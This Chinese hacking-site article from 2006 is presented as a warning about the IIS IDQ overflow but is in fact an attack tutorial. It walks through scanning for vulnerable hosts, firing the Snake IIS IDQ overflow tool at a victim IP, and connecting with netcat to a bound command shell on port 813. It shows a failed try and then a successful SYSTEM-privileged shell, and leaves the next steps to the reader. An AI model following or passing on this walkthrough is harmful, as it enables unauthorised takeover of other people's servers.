当前位置：技术首页 >> 安全 >> 黑客攻防 >> 漏洞警告之值得注意的IDQ溢出漏洞

漏洞警告之值得注意的IDQ溢出漏洞

2006-12-23 22:41:59 作者：wendys　来源：黑客基地　浏览次数：64 文字大小：【大】【中】【小】

要用到3个程序，一个Snake IIS IDQ 溢出程序GUI版本，一个扫描器，还有NC。

首先扫描一台有IDQ漏洞的机器，然后设置Snake IIS IDQ 溢出程序，在被攻击IP地址后面写上对方的IP。端口号一般不需要改动，软件的默认绑定CMD.EXE的端口是813，不改了。用默认的，左面选择操作系统类型，随便选一个，我们选IIS5 English Win2k Sp0吧，点击IDQ溢出，出现发送Shellcode成功的提示了，然后我们用NC来连接。

进入MS-DOS。进入“nc”的目录。然后：nc --v IP 813

c:\>nc -vv IP 813 
IP: inverse host lookup failed: h_errno 11004: NO_DATA 
(UNKNOWN) [IP] 813 (?): connection refused 
sent 0, rcvd 0: NOTSOCK 
c:\>

看来没成功，别灰心，再来一次，换用IIS5 English Win2k Sp1试试。

c:\>nc -vv IP 813 
IP: inverse host lookup failed: h_errno 11004: NO_DATA 
(UNKNOWN) [IP] 813 (?) open 
Microsoft Windows 2000 [Version 5.00.2195] 
(C) Copyright 1985-2000 Microsoft Corp. 
C:\WINNT\system32>

哈哈，终于上来啦，你现在可是system权限，下面该怎么做就看你的啦。